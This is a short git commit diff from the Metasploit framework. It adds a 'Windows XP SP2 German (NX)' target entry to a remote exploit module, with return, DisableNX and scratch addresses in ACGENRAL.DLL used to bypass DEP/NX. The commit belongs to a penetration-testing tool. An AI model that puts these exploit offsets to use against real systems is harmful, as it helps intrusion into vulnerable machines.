Add SP2 German
git-svn-id: file:///home/svn/framework3/trunk@5817 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
d366e8342a
commit
c5ad82fb68
|
@ -128,6 +128,17 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
}
|
||||
], # JMP ESI ACGENRAL.DLL, DEP/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# Target provided think.pink[at]gmx.de
|
||||
#
|
||||
[ 'Windows XP SP2 German (NX)',
|
||||
{
|
||||
'Ret' => 0x6fda2b0f,
|
||||
'DisableNX' => 0x6fda16e2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
#
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# Target provided by sunwear <shellcoder[at]hotmail.com>
|
||||
|
|
Loading…
Reference in New Issue